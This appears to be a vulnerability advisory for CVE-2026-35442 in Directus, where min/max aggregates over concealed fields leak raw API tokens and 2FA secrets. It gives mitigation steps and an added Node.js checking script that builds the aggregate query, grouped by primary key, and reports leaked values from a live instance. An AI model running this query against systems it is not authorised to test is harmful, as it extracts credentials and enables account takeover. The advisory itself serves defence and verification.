Platform
nodejs
Component
directus
Fixed in
11.17.1
11.17.0
CVE-2026-35442 describes an information disclosure vulnerability in Directus. This flaw allows authenticated users with read access to collections to extract concealed field values, potentially exposing sensitive data. The vulnerability affects versions prior to 11.17.0. A fix has been released in version 11.17.0.
The primary impact of CVE-2026-35442 is unauthorized disclosure of sensitive information. Fields marked with the `conceal` special are normally returned as a masked placeholder, but an authenticated user with read access to the collection can request aggregates (min, max) over such a field, and the aggregate is computed on the raw database value rather than the masked one. This exposes concealed values including static API tokens and two-factor authentication secrets stored in the directus_users table. Because these values are credentials, successful exploitation can lead to account takeover, unauthorized data access, and potentially compromise of the whole Directus instance. Combining the aggregate with groupBy (for example, grouping by primary key) turns a single min/max result into one raw value per row, letting an attacker extract many concealed values in one request.
CVE-2026-35442 was publicly disclosed on 2026-04-04. There is currently no indication of active exploitation in the wild. The vulnerability's impact is significant due to the potential for data exfiltration and account compromise, but the requirement for authenticated access limits its immediate exploitability. No public proof-of-concept (PoC) code has been released as of this writing.
Exploit Status
EPSS
0.04% (11th percentile)
The recommended mitigation for CVE-2026-35442 is to upgrade Directus to version 11.17.0 or later immediately. If upgrading is not immediately feasible, tighten read permissions on collections that contain concealed fields, directus_users in particular, so that only roles which genuinely need them can read those collections; this narrows the set of accounts able to reach the aggregate endpoint but does not remove the flaw. Review existing Directus configurations to identify where concealed fields are used and which roles can read them. Because the values at risk are credentials, treat any static token or 2FA secret that an untrusted authenticated user could have read before the upgrade as compromised and rotate it. After upgrading, confirm the fix by querying a concealed field with min and max aggregates (with and without groupBy) and verifying that only the masked placeholder, never a raw value, is returned.
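The following script is an added example, not code from the Directus project or from the original advisory. It shows the shape of the aggregate query described above (min/max over a concealed field, optionally grouped by primary key) and the post-upgrade verification step: build the query, fetch it with a low-privileged read-only token, and flag any returned value that is not the concealed placeholder. The placeholder value `**********`, the `/users` REST path for directus_users and the `aggregate[min]=field` / `groupBy[]=id` query syntax are assumptions about the Directus REST API; the sample responses are constructed, not captured from a real instance. Requires Node 18+ for global `fetch`.

```javascript
// Added example for CVE-2026-35442 (not Directus project code).
// Builds min/max aggregate queries over a concealed field and classifies the
// response: a fixed instance returns the mask (or null), a vulnerable one
// returns raw database values.

// Assumption: Directus returns this placeholder for fields with the `conceal` special.
const CONCEAL_MASK = '**********';

// Build the aggregate query URL.  `endpoint` is the collection's REST path:
// '/users' for directus_users, '/items/<collection>' for user collections
// (assumed from the public Directus REST API).  groupBy is optional.
function buildAggregateUrl(baseUrl, endpoint, fn, field, groupBy) {
  if (!['min', 'max'].includes(fn)) {
    throw new Error(`unsupported aggregate function: ${fn}`);
  }
  const url = new URL(endpoint, baseUrl);
  url.searchParams.set(`aggregate[${fn}]`, field);   // e.g. aggregate[min]=token
  if (groupBy) url.searchParams.append('groupBy[]', groupBy); // one row per group
  return url.toString();
}

// Classify one aggregate response body, assumed shape:
//   { data: [ { min: { <field>: value } }, ... ] }
// null means the aggregate had no rows; the mask means conceal was applied;
// anything else is a raw database value, i.e. a leak.
function classifyAggregate(body, fn, field) {
  const rows = Array.isArray(body && body.data) ? body.data : [];
  const leaked = [];
  for (const row of rows) {
    const value = row && row[fn] ? row[fn][field] : undefined;
    if (value === null || value === undefined || value === CONCEAL_MASK) continue;
    leaked.push(value);
  }
  return {
    checked: rows.length,
    leakedCount: leaked.length,
    leaked,
    vulnerable: leaked.length > 0,
  };
}

// Live check against an instance.  Use a token for an account that has only
// read access to the target collection; a fixed instance yields vulnerable=false.
async function checkInstance(baseUrl, token, endpoint, field, groupBy = 'id') {
  const findings = [];
  for (const fn of ['min', 'max']) {
    const url = buildAggregateUrl(baseUrl, endpoint, fn, field, groupBy);
    const res = await fetch(url, { headers: { Authorization: `Bearer ${token}` } });
    if (!res.ok) {
      findings.push({ fn, url, error: `HTTP ${res.status}` });
      continue;
    }
    const body = await res.json();
    findings.push({ fn, url, ...classifyAggregate(body, fn, field) });
  }
  return findings;
}

// Constructed sample responses (not captured from a real instance).
const SAMPLE_FIXED = {
  data: [{ min: { token: '**********' } }, { min: { token: null } }],
};
const SAMPLE_VULNERABLE = {
  data: [{ min: { token: 'AbCd1234-static-token' } }, { min: { token: null } }],
};

// Offline demonstration; set DIRECTUS_URL and DIRECTUS_TOKEN to run the live check.
if (process.env.DIRECTUS_URL && process.env.DIRECTUS_TOKEN) {
  checkInstance(process.env.DIRECTUS_URL, process.env.DIRECTUS_TOKEN, '/users', 'token')
    .then((f) => console.log(JSON.stringify(f, null, 2)))
    .catch((e) => console.error(e));
} else {
  console.log('fixed instance   :', classifyAggregate(SAMPLE_FIXED, 'min', 'token'));
  console.log('vulnerable instance:', classifyAggregate(SAMPLE_VULNERABLE, 'min', 'token'));
}
```

Run it with `DIRECTUS_URL` and `DIRECTUS_TOKEN` set to check a real instance; any finding with `vulnerable: true` means the aggregate path still bypasses the mask, and the leaked values it reports should be rotated. A non-2xx status (for example, 403 when the token's role cannot read the collection) is reported rather than treated as a pass, since the check is only meaningful for a role that can read the collection.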
Update Directus to version 11.17.0 or higher to fix the vulnerability. This update corrects the improper handling of concealed fields in aggregate queries, preventing the extraction of sensitive information by authenticated users.
CVE-2026-35442 is a HIGH severity vulnerability in Directus versions before 11.17.0 where aggregate functions expose concealed field values, allowing authenticated users to extract sensitive data like API tokens and 2FA secrets.
You are affected if you are running Directus versions prior to 11.17.0 and use concealed fields to protect sensitive data. Upgrade immediately to mitigate the risk.
Upgrade Directus to version 11.17.0 or later. If immediate upgrade is not possible, restrict read access to collections containing concealed fields.
There is currently no indication of active exploitation in the wild, but the vulnerability's impact warrants immediate attention and remediation.
Refer to the official Directus security advisory on their website for detailed information and updates regarding CVE-2026-35442.